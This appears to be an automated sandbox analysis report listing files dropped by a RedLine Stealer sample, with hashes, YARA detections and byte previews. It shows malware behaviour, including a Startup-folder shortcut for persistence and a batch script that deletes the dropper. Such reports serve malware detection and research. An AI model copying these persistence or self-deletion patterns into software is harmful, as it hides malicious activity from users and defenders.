                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ctpdsury.35k.ps1

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u5eu5nit.wpj.psm1

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\build.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):307712
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.081289674980977
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3072:acZqf7D34Tp/0+mA0kywMlQEg85fB1fA0PuTVAtkxzZ3RMeqiOL2bBOA:acZqf7DItnGCQNB1fA0GTV8kv0L
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:3B6501FEEF6196F24163313A9F27DBFD
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:20D60478D3C161C3CACB870AAC06BE1B43719228
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:0576191C50A1B6AFBCAA5CB0512DF5B6A8B9BEF9739E5308F8E2E965BF9B0FC5
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:338E2C450A0B1C5DFEA3CD3662051CE231A53388BC2A6097347F14D3A59257CE3734D934DB1992676882B5F4F6A102C7E15B142434575B8970658B4833D23676
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\build.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....H(...............0.................. ... ....@.. ....................... ............@.................................<...O.... ............................................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc..............................@..B................p.......H....... ...............(w..............................................a.u.t.o.f.i.l.l.5.t.Y.W.R.q.a.W.V.o.a.m.h.h.a.m.J.8.W.W.9.y.b.2.l.X.Y.W.x.s.Z.X.Q.K.a.W.J.u.Z.W.p.k.Z.m.p.t.b.W.t.w.Y.2.5.s.c.G.V.i.a.2.x.t.b.m.t.v.Z.W.9.p.a.G.9.m.Z.W.N.8.V.H.J.v.b.m.x.p.b.m.s.K.a.m.J.k.Y.W.9.j.b.m.V.p.a.W.l.u.b.W.p.i.a.m.x.n.Y.W.x.o.Y.2.V.s.Z.2.J.l.a.m.1.u.a.W.R.8.T.m.l.m.d.H.l.X.Y.W.x.s.Z.X.Q.K.b.m.t.i.a.W.h.m.Y.m.V.v.Z.2.F.l.Y.W.9.l.a.G.x.l.Z.m.5.r.b.2.R.i.Z.W.Z.n.c.G.d.r.b.m.5.8.T.W.

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\microsofts.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1425408
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.68069838387253
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:Pk70Trcosu4CTPpR9+aWsqjnhMgeiCl7G0nehbGZpbD:PkQTAW5v+hDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:1B1EC94BDE0A57A4A82BD2F20B2CB7F3
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:EADF44C3FE2B366CFFE5A5E5232D3DB261ABDC6F
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:2F2A9608F9B6C29C0E7AA3A4E4BD4CCBBE1194CCD430A643E1EA4A684AFE6A9F
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:425451934FD68DAFBA0B72083A31E2AA9FF4CE850C89149E19318A32D1BE9E2E07448E06497DCACCC722F34239FBD17B4B1F5CD0117D97DF9B05A9CF50F19703
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                                                                                                                                              • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Users\user\AppData\Local\Temp\microsofts.exe, Author: ditekSHen
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......h..-,q.~,q.~,q.~2#.~?q.~...~+q.~,q.~\q.~2#n~.q.~2#i~.q.~2#{~-q.~Rich,q.~................0y.f....PE..L...t..P..........#................./.............@.............................................................................P....`..pg..............................................................@............................................text............................... ..`.rdata...m.......n..................@..@.data....0... ......................@....rsrc........`....... ..............@...................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\server_BTC.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):231936
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.039764014369673
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3072:ocaWxnNbVzunOKrp3gGhTbUwjI4C2rpdf1/0dDQFd4jiSCvpoV6l7Mp:PNbhKrpnTbxT18dUFVS6lg
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:50D015016F20DA0905FD5B37D7834823
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:6C39C84ACF3616A12AE179715A3369C4E3543541
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:36FE89B3218D2D0BBF865967CDC01B9004E3BA13269909E3D24D7FF209F28FC5
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:55F639006A137732B2FA0527CD1BE24B58F5DF387CE6AA6B8DD47D1419566F87C95FC1A6B99383E8BD0BCBA06CC39AD7B32556496E46D7220C6A7B6D8390F7FC
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0......~......n(... ...@....@.. ....................................`..................................(..W....@...z........................................................................... ............... ..H............text...t.... ...................... ..`.rsrc....z...@...|..................@..@.reloc..............................@..B................P(......H........>...............=..p...........................................".(!....*..s3...z..*.s.........*.(.....*Z~ ...oK...~....(!....*.(5....*&.(!.....*".......*".(u....*Vs....(v...t.........*&..(.....*Br...p(.....(...*.sL....)...*.*...0...........r...p....s........ ................. ........8[...........o.........................% ....X....o....a.o.............o....]......... ....X............o....?....(........o....o ...............8........*....0..........r)..p(....("....

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmpEAAD.tmp.cmd

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\server_BTC.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):164
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.9488036015393675
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:mKDDCMNvFbuov3DUkh4E2J5xAIJWAdEFKDwU1hGDUkh4E2J5xAInTRIKtTIhfBQk:hWKdbuoL923fJWAawDNe923fTr+
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:F1490DC2DDA4552466FC6637181BE96F
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:4F2BF85BD51221A8AED0D9C2C6583FBD9279FFD6
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:2B4501A1E6DA54D9FFB01506FBEC343C5D17DA55BC6EADF3AE1891BDEC376FF6
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:4A7952625220566944D04B190C0702BF067A82FDE902C86F7A84EBD1D31A3A7D2B26F97A0593B3EB273EAE9E43905BE5846F323355703A3DE423C2E0BED61893
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:@echo off..timeout 6 > NUL..CD C:\Users\user\AppData\Local\Temp..DEL "server_BTC.exe" /f /q..CD C:\Users\user\AppData\Local\Temp\..DEL "tmpEAAD.tmp.cmd" /f /q..

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\vehiculation

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\AENiBH7X1q.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2598912
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.759549710225937
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:49152:tN91yFyaAOd+floCaJNjz2XbC68KthjXOhOxZUQsrQx+wkAvq3Yfcxl+:tN91yFzuoCQNG2jK5ioZqS+2Sl+
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:743F5DD096D5FC69A30E0D9A7BD6C0B5
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:2550886978322E9A57B7C011587025BD1345BAE5
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:6AE8CAD15C24109F0EDA03A541DBF09012C9213E658900F459F98F75093F29D0
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:B2674A370F9BB0815121D2E2B8A8D907E50C787A92F1A50ECFE419649E37C9610AB45FA800A9BE0BACC980F93CC256D7832CA4119D3EC359648664E8C2A9C0F6
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:{c.YG2QNIETY..7I.99YD2QN.ETYQ77I699YD2QNMETYQ77I699YD2QNMETY.77I8&.WD.X.l.U...c!_J.)6]6<,(t:0YY&B.[<d@$ m,:y.xdi[V]<j?\DiETYQ77If|9Y.3UNMETYQ77I699Y.2^MFDRYQ?7I6.'YD2QN8QTYQ'7I6.'YD2.NMUTYQ57I299YD2QNIETYQ77I6..YD6QN..sYS77I69)YD"QNMEDYQ'7I699YT2QNMETYQ77I..'Y.2QNM.JY.57I699YD2QNMETYQ77I699YD2QNMETYQ77I699YD2QNMETYQ77I699YD2QNMETYQ77I699YD2QN..JY.77I699YD2QNMETYQ77I699YD2QNc11!%77I>?9YD"QNMMTYQ37I699YD2QNMETYq77).K]80SQN..JYQ.7I6.'YD>QNMETYQ77I699Y.2Q.c''*Q77I299YD.ONMETYQ77I699YD2QNMETY.77..KJ+'2QNM.\YQ.)I6.1YD.ONMETYQ77I699Y.2Q.METYQ77I699YD2QNMETYQ77I699YD2QNMETYQ77I699YD2QNMETYQ77I699YD2QNMETYQ77I699YD2QNMETYQ77I699YD2QNMETYQ77I699YD2QNMETYQ77I699YD2QNMETYQ77I699YD2QNMETYQ77I699YD2QNMETYQ77I699YD2QNMETYQ77I699YD2QNMETYQ77I699YD2QNMETYQ77I699YD2QNMETYQ77I699YD2QNMETYQ77I699YD2QNMETYQ77I699YD2QNMETYQ77I699YD2QNMETYQ77I699YD2QNMETYQ77I699YD2QNMETYQ77I699YD2QNMETYQ77I699YD2QNMETYQ77I699YD2QNMETYQ77I699YD2QNMETYQ77I699YD2QNMETYQ77I699YD2QNMETYQ77I699YD2QNMETYQ77I699YD2QNMETYQ77I699YD2QN

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\server_BTC.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):231936
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.039764014369673
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3072:ocaWxnNbVzunOKrp3gGhTbUwjI4C2rpdf1/0dDQFd4jiSCvpoV6l7Mp:PNbhKrpnTbxT18dUFVS6lg
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:50D015016F20DA0905FD5B37D7834823
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:6C39C84ACF3616A12AE179715A3369C4E3543541
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:36FE89B3218D2D0BBF865967CDC01B9004E3BA13269909E3D24D7FF209F28FC5
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:55F639006A137732B2FA0527CD1BE24B58F5DF387CE6AA6B8DD47D1419566F87C95FC1A6B99383E8BD0BCBA06CC39AD7B32556496E46D7220C6A7B6D8390F7FC
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0......~......n(... ...@....@.. ....................................`..................................(..W....@...z........................................................................... ............... ..H............text...t.... ...................... ..`.rsrc....z...@...|..................@..@.reloc..............................@..B................P(......H........>...............=..p...........................................".(!....*..s3...z..*.s.........*.(.....*Z~ ...oK...~....(!....*.(5....*&.(!.....*".......*".(u....*Vs....(v...t.........*&..(.....*Br...p(.....(...*.sL....)...*.*...0...........r...p....s........ ................. ........8[...........o.........................% ....X....o....a.o.............o....]......... ....X............o....?....(........o....o ...............8........*....0..........r)..p(....("....

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnk

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\server_BTC.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Icon number=0, Archive, ctime=Tue Nov 5 15:02:52 2024, mtime=Tue Nov 5 15:02:52 2024, atime=Tue Nov 5 15:02:50 2024, length=231936, window=
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1794
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.5040556851802305
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:8YsrHfV88Rw7TZKuuaqL6p5UAis4FSnplwO4ZTql6nzA9Um:8YWHnRwfuaq6p9D4+plwZTql6s9U
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:26CC4AC00C48306D3FE4A822278DDF86
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:D23CB43A5378C248111CC4EAB081C5A6CDEF6A89
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:4DC806C9309B5D4206DD44D858AB473F158BD2002D0012E9549FFD0783193D05
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:D99957524509E399D1861969632FB52F0CA4178DCA078149E92E477DF6370E7F1280F9CAAADD95677248BE418D8177EA001E8EDF2D4BCE425766859EAB413D05
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:L..................F.@.. ....T.+./..O..+./...x)*./............................:..DG..Yr?.D..U..k0.&...&...... M........!./..O..+./......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSleYU.....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....eYY...Roaming.@......DWSleYY.....C.........................R.o.a.m.i.n.g.....T.1.....eY[...ACCApi..>......eY[.eY[.....*.....................VX..A.C.C.A.p.i.....l.2.....eYZ. .TROJAN~1.EXE..P......eY[.eY[.....?.........................T.r.o.j.a.n.A.I.b.o.t...e.x.e.......e...............-.......d............A.......C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe....A.c.c.S.y.s.%.....\.....\.....\.....\.....\.A.C.C.A.p.i.\.T.r.o.j.a.n.A.I.b.o.t...e.x.e.1.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.s.e.r.v.e.r._.B.T.C...e.x.e.........%USERPROFILE%\AppData\Local\Temp\server_BTC.exe............................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\cfd441acea3434e2.bin

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):12320
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.985513759796738
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:192:rh3OhTJHDcwlN2BigBLl8LIBrapNDFpGC1izNAKhgUxn3H2U56vU:rhGTJzlrgBLKLMro1oaKPX/6vU
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:8CEBF1709109FBB18B8352D3F2BE4279
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:455BC357937B86B6698C635DD39378493B09CCF2
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:8AC44C2DE3979D8C9DC08A0375F46686D3F0410354140840C7427A5C1911FC9E
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:AE568D9BF6116D0A4A6AB181793691A0490C1324195D0F6E4B9B8DEE85316E720ED7F0CC6A9CEE84AC585CB7E88E17F41CDAC61A1A5C3D68B127747DD92A17BE
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:H.!.[zDa.O.B...7.!3.:8.A...9........?,=.`.......L.;m7Pn....=\.n....Yk]...'..D..<.{.#..vr.![8...]5... &...V.x)9.{k..L.H....a.......r..<..H\....w....+\C.B.W. Q%.1..u}5y}..O:.X.....0.e...sd.".$9.ro.....M.g?K.s.F`B2..r.a>HdW.a;...rh.e.-..-;..:"...E..U<....Nw.*...E..a.U.m.I..0....x.I.....v..LY2@....=....S.....6Cn...X^...Ce.g.jLeL.$j..hK.,..G..U....t.+WE.F.A.Z,.2.pZ....W-.AQ....S..R..9H.W...!V.......t]...]...,n.%K.I....I..?.c...._.GH.Ci...=.....fj.`i..)....."y{.y.5u..;.....a......b......f......D..Y.`5..f/.4....c....iR..y}...F.].....5...<.x%............c..y...f..j.^u.a.m2.Z......M.........:.P|.-.o..<...@..8$h.q.A.O...{.-.........W..At.m......m&#.7..>?Q.4.....bjNX.....o....D..4.b...L..FM6....L.@.'....Y..M.=".k.YO.1..:...CR...|......(..p.b......*^.]..:O....x;..............C.oI...#..:....y..K..(.L...L.l.JN...3(d.P.d.....h....M.Cn@....d`s...,..Rf@.R.j..z....a.0{....O.C.n.E.!../h.[.,..7.@....u...W....g.k].\.r.."o.R.uU.._+E&..g.!.DZ.NNa...B..|vw.......

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\DtcInstall.log

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msdtc.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2313
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.1313124021457375
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:48:32qhuhCehuhqfhuhofhuhE2qhuh6987FMx7F/rt57wt+07FKC7867qrT7FoC786x:Z070s0Y0q0mF7Dm5K
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:6D36DDC9D4FF1E6F27826A2E33D8ECE3
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:78A0A40F26E188BADF90FAB4928B734F212502C9
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:5961D8A95179EE722C79C4DF784115BD560BD8DCB089BC7CEA50D6DAE0F70787
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:101D013957AA1FD9E91EE4319EF9A5BA5007649D2C1A2D625FD689F2FA1B5B0F2057E17B94429EA0E612E115B85D19267DA1274F47DDBB2DE280D50A44B57F41
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:12-07-2019 09:17 : DTC Install error = 0, Enter MsDtcAdvancedInstaller::Configure, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (367)..12-07-2019 09:17 : DTC Install error = 0, Action: None, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (396)..12-07-2019 09:17 : DTC Install error = 0, Entering CreateXATmSecurityKeyCNG, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (1700)..12-07-2019 09:17 : DTC Install error = 0, Exiting CreateXATmSecurityKeyCNG, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (1876)..12-07-2019 09:17 : DTC Install error = 0, Exit MsDtcAdvancedInstaller::Configure, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (454)..10-03-2023 08:56 : DTC Install error = 0, SysPrepDtcSpecialize : Enter, com\complus\dtc\dtc\adme\deployment.cpp (2099) ..10-03-2023 08:56 : DTC Install error = 0, SysPrepDtcGeneralize : Enter, com\complus\dtc\dtc\adme\deploy

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\Logs\WindowsBackup\WBEngine.0.etl

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\wbengine.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):40960
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):0.9455999284510301
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:48:zz+/EEaTmJxT+5PDqnP2FPREutA/gsPrPGPTPftzsmmzs6QzspAF1saR8qkVWGG:O/EEJ9+5foutARAFCIL
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:F47168F48B98570B5C4BA8E37AAC9D04
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:2B394A755FD6F47C343128436D9B449B42ADE98C
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:016AC24EBEAE7A0C38904580AA10E10159A1B2236398F986D7443B782BF22280
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:A83A6F68EA7099016CECD4809BCAA4E07B7CCD049D9198F7D6024022656755345469F13F58425E473801D5707B82CA08461339B9F5D761514CC9188649AFADBB
